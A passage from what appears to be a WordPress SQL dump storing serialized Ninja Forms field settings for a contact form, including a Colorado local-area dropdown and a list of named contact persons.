Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(18209,664,'key','listselect_146','key','listselect_146'),(18210,664,'container_class','one-half first','container_class','one-half first'),(18211,664,'parent_id','2','parent_id','2'),(18212,664,'field_label','Your Local Area','field_label','Your Local Area'),(18213,664,'field_key','listselect_146','field_key','listselect_146'),(18214,664,'idAttribute','id','idAttribute','id'),(18215,665,'objectType','Field','objectType','Field'),(18216,665,'objectDomain','fields','objectDomain','fields'),(18217,665,'editActive','','editActive',''),(18218,665,'order','7','order','7'),(18219,665,'type','listselect','type','listselect'),(18220,665,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(18221,665,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(18222,665,'label_pos','above','label_pos','above'),(18223,665,'list_type','dropdown','list_type','dropdown'),(18224,665,'multi_size','5','multi_size','5'),(18225,665,'list_show_value','1','list_show_value','1'),(18226,665,'list','a:0:{}','list','a:0:{}'),(18227,665,'user_info_field_group','','user_info_field_group',''),(18228,665,'calc_auto_include','0','calc_auto_include','0'),(18229,665,'user_state','0','user_state','0'),(18230,665,'num_sort','0','num_sort','0'),(18231,665,'admin_label','','admin_label',''),(18232,665,'show_help','0','show_help','0'),(18233,665,'help_text','','help_text',''),(18234,665,'show_desc','0','show_desc','0'),(18235,665,'desc_pos','none','desc_pos','none'),(18236,665,'desc_text','','desc_text',''),(18237,665,'element_class','','element_class',''),(18238,665,'required','1','required','1'),(18239,665,'options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Initiator-Marcie Tucker\";s:5:\"value\";s:23:\"Initiator-Marcie Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Barry Frost\";s:5:\"value\";s:25:\"ESA-Initiator-Barry Frost\";s:4:\"calc\";s:1:\"-\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"2\";s:12:\"manual_value\";b:1;}i:3;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:5:\"value\";s:29:\"ESA-Initiator-Gardiner Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";s:12:\"manual_value\";b:1;}}','options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 